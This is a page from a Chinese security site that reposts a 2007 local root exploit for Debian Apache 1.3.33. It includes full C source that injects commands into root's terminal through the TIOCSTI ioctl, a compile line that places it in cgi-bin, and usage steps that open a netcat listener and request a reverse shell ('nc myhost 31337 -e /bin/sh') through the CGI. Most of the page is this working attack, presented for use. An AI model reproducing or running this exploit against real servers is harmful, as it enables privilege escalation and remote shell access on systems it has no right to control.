首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
来源:www.vfocus.net 作者:Kristian 发布时间:2007-03-01  
/*
  :: Kristian Hermansen ::
  Date: 20070228
  Description: Local attacker can influence Apache to direct commands
    into an open tty owned by user who started apache process, usually root.
    This results in arbitrary command execution.
  Affects: Debian Stable, Apache 1.3.33-6sarge3
  Notes: Must have CGI execution privileges and
    service started manually by root via shell.
    Also try adding "Options +ExecCGI" to your .htaccess file.
  Compile: gcc -o /path/to/cgi-bin/cgipwn cgipwn.c
  Usage: nc -vvv -l -p 31337
    http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d
  u53l355 gr33t5: yawn, jellyfish, phzero, pegasus, b9punk, phar, shardy,
    benkurtz, ... and who could forget ... setient (the gremlin)!!
*/

#include <fcntl.h>
#include <sys/ioctl.h>

int main(int argc, char *argv[])
{
  int pts = open("/dev/tty",O_RDONLY);
  while(*argv[1] != '\0') {
    ioctl(pts,TIOCSTI,argv[1]);
    argv[1]++;
  }
  return 0;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Plan 9 Kernel (devenv.c OTRUNC
·XM Easy Personal FTP Server 5.
·McAfee VirusScan for Mac (Vire
·vBulletin <= 3.6.4 (inlinemod.
·3Com TFTP Service <= 2.0.1 (Lo
·NetProxy <= 4.03 Web Filter Ev
·madwifi <= 0.9.2.1 WPA/RSN IE
·Snort 2.6.1 DCE/RPC Preprocess
·DivX Web Player 1.3.0 (npdivx3
·phpMyFAQ <= 1.6.7 Remote SQL I
·PHP 4 Userland ZVAL Reference
·Oracle 9i/10g ACTIVATE_SUBSCRI
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved